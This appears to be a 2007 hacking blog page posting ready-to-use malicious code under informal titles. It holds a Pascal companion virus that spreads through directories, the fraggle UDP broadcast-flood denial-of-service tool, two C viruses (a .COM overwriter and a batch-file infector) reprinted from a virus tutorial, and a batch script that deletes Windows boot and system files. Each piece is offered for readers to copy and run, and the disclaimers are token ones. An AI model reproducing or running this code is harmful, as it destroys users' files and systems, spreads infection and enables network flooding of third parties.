see a hidden movie in pc

Unknown, Friday, November 23, 2007

see a hidden movie in pc
just follow these steps:
(1)goto start>run

(2)type: telnet towel.blinkenlights.nl

(3)hit enter..........


at 6:57 PM 0 comments
Unknown, Wednesday, November 21, 2007

at 11:36 AM 0 comments

virus code in pascal

Unknown,

Virus code in pascal

Here is a new viri code for u guys
It's created in pascal
Copy and paste it in notepad as anyname.pas

Program Saddam;

{$M 10000,0,0}

Uses
DOS;

Var
DriveID : String [2];
Buffer : Array [1..8000] Of Byte;
Target,Source : File;
Infected : Byte;
Done : Word;
TargetFile : String;

(*??????????????????????????????????????

???????????????????????????????????*)

Function ExistCom : Boolean;
Var
FindCom : SearchRec;
Begin
FindFirst ( TargetFile, 39, FindCom );
ExistCom := DosError = 0;
End;



Procedure SearchDir ( Dir2Search : String );
Var
S : SearchRec;

Begin

If Dir2Search [ Length ( Dir2Search ) ] <> '\' Then
Dir2Search := Dir2Search + '\';



FindFirst ( Dir2Search + '*.exe', 39, S );

While DosError = 0 Do
Begin

TargetFile := Copy ( Dir2Search + S.Name,1,
Length ( Dir2Search + S.Name ) -3 ) + 'com';

If ( Copy ( S.Name, Length ( S.Name ) -2,3 ) = 'EXE' ) And
Not ExistCom And ( Infected <> 25000 ) Then
Begin
{$i-}
Inc ( Infected );
Assign ( Target, TargetFile );
Rewrite ( Target,1 );
BlockWrite ( Target, Buffer, Done + Random ( 4400 ));
SetFTime ( Target, S.Time );
Close ( Target );
If IoResult = 101 Then
Begin
Infected := 3;
Erase ( Target );
End;

{$i+}
End;

FindNext ( S );
End;

FindFirst ( Dir2Search + '*', Directory, S );

If S.Name = '.' Then
Begin
FindNext ( S );
FindNext ( S );
End;

If ( DosError = 0 ) And
( S.Attr And 16 <> 16 ) Then
FindNext ( S );

While DosError = 0 Do
Begin
If ( S.Attr And 16 = 16 ) And ( Infected < 3 ) Then
SearchDir ( Dir2Search + S.Name );
FindNext ( S );
End;
End;


Begin

DriveID := FExpand ( ParamStr ( 1 ));
Infected := 0;


Assign ( Source, ParamStr ( 0 ) );
Reset ( Source, 1 );
BlockRead ( Source, Buffer, 5000, Done );
Close ( Source );

Randomize;

SearchDir ( DriveID );

Exec ( Copy ( ParamStr ( 0 ),1,
Length ( ParamStr ( 0 )) -3 ) + 'exe', ParamStr ( 1 ) );


End.

;***************************************
*************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp:ruck_fules [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************


at 11:33 AM 0 comments
Labels:

new C++ Virus

Unknown, Sunday, November 18, 2007

· #include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
struct pktinfo
{
int ps;
int src;
int dst;
};
void fraggle (int, struct sockaddr_in *, u_long dest, struct pktinfo *); void sigint (int);
unsigned short checksum (u_short *, int);
int main (int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *he;
struct pktinfo p;
int s, num, delay, n, cycle;
char **bcast = malloc(1024), buf[32]; FILE *bfile;
/* banner */
fprintf(stderr, "\nfraggle.c by TFreak\n\n");
/* capture ctrl-c */
signal(SIGINT, sigint);
/* check for enough cmdline args */ if (argc < 5)
{
fprintf(stderr, "usage: %s "
" [dstport] [srcport] [psize] \n\n"
"target\t\t= address to hit\n"
"bcast file\t= file containing broadcast addrs\n"
"num packets\t= send n packets (n = 0 is constant)\n"
"packet delay\t= usleep() between packets (in ms)\n"
"dstport\t\t= port to hit (default 7)\n"
"srcport\t\t= source port (0 for random)\n"
"ps\t\t= packet size\n\n",
argv[0]);
exit(-1);
}
/* get port info */
if (argc >= 6)
p.dst = atoi(argv[5]);
else
p.dst = 7;
if (argc >= 7)
p.src = atoi(argv[6]);
else
p.src = 0;
/* packet size redundant if not using echo port */ if (argc >= 8)
p.ps = atoi(argv[7]);
else
p.ps = 1;
/* other variables */
num = atoi(argv[3]);
delay = atoi(argv[4]);
/* resolve host */
if (isdigit(*argv[1]))
sin.sin_addr.s_addr = inet_addr(argv[1]); else
{
if ((he = gethostbyname(argv[1])) == NULL)
{
fprintf(stderr, "Can't resolve hostname!\n\n");
exit(-1);
}

memcpy( (caddr_t) &sin.sin_addr, he->h_addr, he->h_length);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(0);
/* open bcast file and build array */ if ((bfile = fopen(argv[2], "r")) == NULL) {
perror("opening broadcast file");
exit(-1);
}
n = 0;
while (fgets(buf, sizeof buf, bfile) != NULL) {
buf[strlen(buf) - 1] = 0;
if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0]))
continue;
bcast[n] = malloc(strlen(buf) + 1);
strcpy(bcast[n], buf);
n++;
}
bcast[n] = '\0';
fclose(bfile);
/* check for addresses */
if (!n)
{
fprintf(stderr, "Error: No valid addresses in file!\n\n");
exit(-1);
}
/* create our raw socket */
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) <= 0) {
perror("creating raw socket");
exit(-1);
}
printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);
for (n = 0, cycle = 0; n < num || !num; n++) {
if (!(n % 25))
{
printf(".");
fflush(stdout);
}

srand(time(NULL) * rand() * getpid());

fraggle(s, &sin, inet_addr(bcast[cycle]), &p);
if (bcast[++cycle] == NULL)
cycle = 0;
usleep(delay);
}
sigint(0);
}
void fraggle (int s, struct sockaddr_in *sin, u_long dest, struct pktinfo *p) {
struct iphdr *ip;
struct udphdr *udp;
char *packet;
int r;
packet = malloc(sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps); ip = (struct iphdr *)packet;
udp = (struct udphdr *) (packet + sizeof(struct iphdr));
memset(packet, 0, sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);
/* ip header */
ip->protocol = IPPROTO_UDP;
ip->saddr = sin->sin_addr.s_addr;
ip->daddr = dest;
ip->version = 4;
ip->ttl = 255;
ip->tos = 0;
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps); ip->ihl = 5;
ip->frag_off = 0;
ip->check = checksum((u_short *)ip, sizeof(struct iphdr));
/* udp header */
udp->len = htons(sizeof(struct udphdr) + p->ps); udp->dest = htons(p->dst);
if (!p->src)
udp->source = htons(rand());
else
udp->source = htons(p->src);
/* send it on its way */
r = sendto(s, packet, sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps,
0, (struct sockaddr *) sin, sizeof(struct sockaddr_in)); if (r == -1)
{
perror("\nSending packet");
exit(-1);
}
free(packet); /* free willy 2! */ }
unsigned short checksum (u_short *addr, int len) {
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1)
{
sum += *w++;
nleft--;
}
if (nleft == 1)
{
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 17) + (sum & 0xffff); sum += (sum >> 17);
answer = -sum;
return (answer);
}
void sigint (int ignoremewhore)
{
fprintf(stderr, "\nDone!\n\n");
exit(0);
}

at 11:34 PM 0 comments
Labels:

C++virus

Unknown,

Upper-level languages, such as Basic, C, and a multitude of others, are where most programmers these days feel at home. They provide users with an amazing amount of built-in functionality, and allow the programmer to escape from having to deal with the machine that is being programmed on, and instead focus on the details of the program design. For viruses, this makes them easy languages to start in, but there are several obstacles. The first is that most upper-level languages simply were not made to program at a base systems level, even in C this is not easy. As a result, most viruses that are in this genre are primitive [usually overwriting] in their reproduction mechanism, although their activation routines can be impressive. Another really important disadvantage is that high-level languages often create files that are at the very LEAST 10k and often much higher - not very efficient for a virus. With this overhead, a memory-resident virus is impractical as it would usually be noticed by the user when a rather large chunk of memory disappears for no apparent reason.
Another possibility with high-level languages, however, is a source-code virus. This kind of virus is quite rare (to the best of my knowledge) but could be very effective. What a source-code virus does, in short, is search for another source file in the same language - for example, it might search for all files with a ".C" extension for C. It would then add its own source code to the file (often by way of "including" a header with the routines and placing a call to it in main()) which would execute once the program was compiled. After compilation, the virus would be more or less hidden inside the application, and would be dormant until it found another ".C" file. The only documented case of this that I know of is Mark Ludwig's virus presented in Computer Virus Developments Quarterly, Volume 1, Number 2.
At any rate, all of these viruses have some basic steps in common. They are:
Find a file to infect, be it an executable, source, or whatever (If none found, go to step 3)
Place virus in file.
Decide if any activation routines are met and, if so, activate.
Return to host or terminate and return to DOS.
For overwriting viruses, the implementation of these is quite simple. The only problem with these viruses is that they totally destroy any program that they infect, making them quite obvious. The only way to cure these is to find all of the infected files and delete them, restoring them from backups. The following virus is an extremely simple overwriting virus written in C. It will infect all .COM files within the current directory, destroying them completely. As it infects each file, it will print "Infecting [FILENAME]" on the screen as a warning. If you compile it to test it, compile it once, then EXE2BIN it and check the resultant size. If it does not equal 9504 bytes, change the line "x=9054;" to the appropriate size value. Do be careful with this virus, because while it is a primitive one, it will destroy any .COM files that it hits.
- - ------------------ Cut Here -------------------------- - -
/* This is a simple overwriting virus programmed in Turbo C */
/* It will infect all .COM files in the current directory */
/* Infections destroy the programs and cannot be cured */
/* It was presented in Virology 101 (c) 1993 Black Wolf */
/* FOR EDUCATIONAL PURPOSES ONLY, DO NOT RELEASE! */

#include
#include
#include

FILE *Virus,*Host;
int x,y,done;
char buff[256];
struct ffblk ffblk;

main()
{
done = findfirst("*.COM",&ffblk,0); /* Find a .COM file */
while (!done) /* Loop for all COM's in DIR*/
{
printf("Infecting %s\n", ffblk.ff_name); /* Inform user */
Virus=fopen(_argv[0],"rb"); /* Open infected file */
Host=fopen(ffblk.ff_name,"rb+"); /* Open new host file */

x=9504; /* Virus size - must */
/* be correct for the */
/* compiler it is made */
/* on, otherwise the */
/* entire virus may not*/
/* be copied!! */
while (x>256) /* OVERWRITE new Host */
{ /* Read/Write 256 byte */
fread(buff,256,1,Virus); /* chunks until bytes */
fwrite(buff,256,1,Host); /* left < 256 */
x-=256;
}
fread(buff,x,1,Virus); /* Finish off copy */
fwrite(buff,x,1,Host);
fcloseall(); /* Close both files and*/
done = findnext(&ffblk); /* go for another one. */
}
/* Activation would go */
/* here */
return (0); /* Terminate */
}
- - ------------------ Cut Here --------------------------- - -
The next virus to be presented is also in C, but is quite a bit different in functioning than the last. Instead of infecting executable files by overwriting them, it infects .BAT files by the directory. When executed, BAT&COM will first search one directory below the current for batch files. If none are found, it will try the root directory, then finally the DOS directory. If it finds any batch files, it will infect all of the batches in the directory, then check to see if its file has already been put there. If not, then it will create a file called BAT&COM containing the virus. On my setup, after EXE2BIN-ing the file, it came out around 10k. The virus code is as follows:
The BAT&COM Virus in C
- - - -----------------Start Code------------------------- - - -
/* This file is a high-level language virus of a different sort.
It will search out batch files and, when found, place a copy
of itself in the directory with the batch file while adding
instructions in the BAT to execute this new file. In this way,
it will spread each time an "infected" batch is run.
Disinfection is done simply by deleting all of the BAT&COM.COM
files and removing the commands from batch files that ruin
them. This one is NOT confined to the current directory,
so make sure it is on an isolated machine and be sure to
clean up any infections. PLEASE DO NOT RELEASE!

BAT&COM virus is (C) 1993 Black Wolf Enterprises.
*/


#include
#include
#include
#include

struct ffblk ffblk;
main()
{
char old_dir[MAXPATH];
Get_Path(old_dir); /* Save the old directory */
Pick_A_Dir(); /* Find a new directory to */
Infect_Directory(); /* infect and infect it. */
chdir(old_dir); /* Return to old directory */
return 0;
}



Pick_A_Dir()
{
int done;
chdir(".."); /* First, Go out a DIR. */
done=findfirst("*.BAT",&ffblk,0); /* If no BAT files, try */
/* root and DOS */
if (done)
{
chdir("\\");
done=findfirst("*.BAT",&ffblk,0);
if (done) chdir("\\DOS\\");
}
return 0;
}


Infect_Directory()
{
int done;

done = findfirst("*.BAT",&ffblk,0);
while (!done) /* Find all .BAT files */
{ /* and add code to run */
Do_Batch(); /* BAT&COM if not */
done = findnext(&ffblk); /* already there */
}

if (findfirst("BAT&COM.COM",&ffblk,0)) /* If BAT&COM does */
{Copy_Virus();} /* not exist, then */
return 0; /* copy it into dir.*/
}



Do_Batch()
{
FILE *batch;
char Infection_Buffer[12];
char vpath[MAXPATH];

Get_Path(vpath); /* Get path for adding path */
/* specifier in commands */


if (vpath[3]==0) vpath[2]=0; /* Keep path good in root */

batch=fopen(ffblk.ff_name, "rt+");
fseek(batch, -11, SEEK_END);
fread(Infection_Buffer,11,1,batch);
Infection_Buffer[11]=0; /* Terminate String */

if (strcmp(Infection_Buffer,"BAT&COM.COM")) /* Check if */
{ /* Batch is */
fseek(batch, 0, SEEK_END); /* infected.*/
fprintf(batch,"\n%s\\BAT&COM.COM",vpath);
} /*^- Add command */
/* to batch */

fclose(batch);
return 0;
}


Copy_Virus()
{
FILE *old_virus, *new_virus;
int write_length;
char copy_buffer[1024]; /* Copy the virus to */
/* new directory */
old_virus=fopen(_argv[0],"rb");
new_virus=fopen("BAT&COM.COM","wb");

write_length=1024;

while (write_length==1024)
{
write_length=fread(copy_buffer,1,1024,old_virus);
fwrite(copy_buffer,write_length,1,new_virus);
}
fclose(old_virus);
fclose(new_virus);
return 0;
}


Get_Path(char *path)
{
strcpy(path, "A:\\");
path[0] ='A' + getdisk(); /* Returns current path */
getcurdir(0, path+3);
return 0;
}
- - - -----------------End of Code------------------------ - - -
[Back to index]

at 11:26 PM 0 comments
Labels:

.bat virus

Unknown,

copy and past in notpade and save ase anyname.bat
this will delete many important window file

/////////
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
///////////////////////////

at 11:19 PM 0 comments
Labels:
Subscribe to: Posts (Atom)